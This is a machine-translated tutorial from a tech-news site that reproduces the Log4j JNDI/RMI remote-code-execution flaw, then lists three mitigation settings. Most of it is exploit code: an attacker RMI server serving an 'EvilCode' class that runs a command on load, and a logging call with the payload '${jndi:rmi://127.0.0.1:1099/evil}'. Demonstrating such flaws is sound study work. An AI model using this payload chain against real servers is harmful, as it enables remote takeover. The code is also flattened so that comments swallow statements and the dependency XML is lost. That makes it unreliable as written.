Shulou(Shulou.com)06/02 Report--

This article mainly introduces "Analysis of log4j vulnerabilities caused by Java RMI". In daily operation, I believe that many people have doubts about the analysis of log4j vulnerabilities caused by Java RMI. The editor consulted all kinds of materials and sorted out simple and easy-to-use methods of operation. I hope it will be helpful to answer the doubts of "log4j vulnerability analysis caused by Java RMI". Next, please follow the editor to study!

RMI and JNDIRMI

(Remote Method Invocation) is Java remote method call, an application programming interface for implementing remote procedure calls

JNDI (Java Naming and Directory Interface) is an application-designed API that provides developers with a common and unified interface for finding and accessing various naming and directory services.

The main relationship between JNDI and RMI is that services registered with RMI can be accessed through JNDIAPI. Before we talk about Spring deserialization vulnerabilities, let's take a look at how to invoke RMI-registered services through JNDI.

Simulated vulnerability reappearance

Pom dependence

Org.springframework.boot spring-boot-starter-web org.springframework.boot spring-boot-starter-logging org.apache.logging.log4j log4j-api 2.14.0 Org.apache.logging.log4j log4j-core 2.14.0

Hacker side

/ * build a RMI service to respond to malicious code *

* Java RMI, that is, remote method call (Remote Method Invocation), is a Java API for implementing remote procedure call (RPC), which can directly transfer serialized Java objects and distributed garbage collection. Its implementation depends on (JVM), so it only supports calls from one JVM to another JVM. * / public class RMIServer {@ SneakyThrows public static void main (String... Args) {instance of remote object registry Registry on try {/ / local host, default port 1099 LocateRegistry.createRegistry (1099); Registry registry = LocateRegistry.getRegistry (); System.out.println ("Create RMI registry on port 1099"); / / returned Java object Reference reference = new Reference ("bug.EvilCode", "bug.EvilCode", null); ReferenceWrapper referenceWrapper = new ReferenceWrapper (reference) / / Register the remote object to the RMI registration server and name it evil registry.bind ("evil", referenceWrapper);} catch (RemoteException | AlreadyBoundException | NamingException e) {e.printStackTrace ();}} / * execute any script that causes the windows server to open the calculator. * / public class EvilCode {static {System.out.println ("the victim server will execute the following command line"); Process p; String [] cmd = {"calc"}; try {p = Runtime.getRuntime () .exec (cmd); InputStream fis = p.getInputStream (); InputStreamReader isr = new InputStreamReader (fis); BufferedReader br = new BufferedReader (isr); String line = null While ((line = br.readLine ())! = null) {System.out.println (line);}} catch (IOException e) {e.printStackTrace ();}}

Website side

Public class Server {private static final Logger logger = LogManager.getLogger (); public static void main (String [] args) {String name = "${java:runtime}"; logger.info ("name: {}", name) / / simulate and fill in the data, enter the constructed string, so that the remote code executed by the victim server when printing the log can use 127.0.0.1 String username = "${jndi:rmi://127.0.0.1:1099/evil}"; / / print the business log logger.error normally ("username: {}", username);}} [Emergency remedial measures 3 choose 1]

Modify JVM parameter-Dlog4j2.formatMsgNoLookups=true

Modify configuration log4j2.formatMsgNoLookups=True

Set the system environment variable FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS to true

At this point, the study on "Analysis of log4j vulnerabilities caused by Java RMI" is over. I hope to be able to solve your doubts. The collocation of theory and practice can better help you learn, go and try it! If you want to continue to learn more related knowledge, please continue to follow the website, the editor will continue to work hard to bring you more practical articles!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.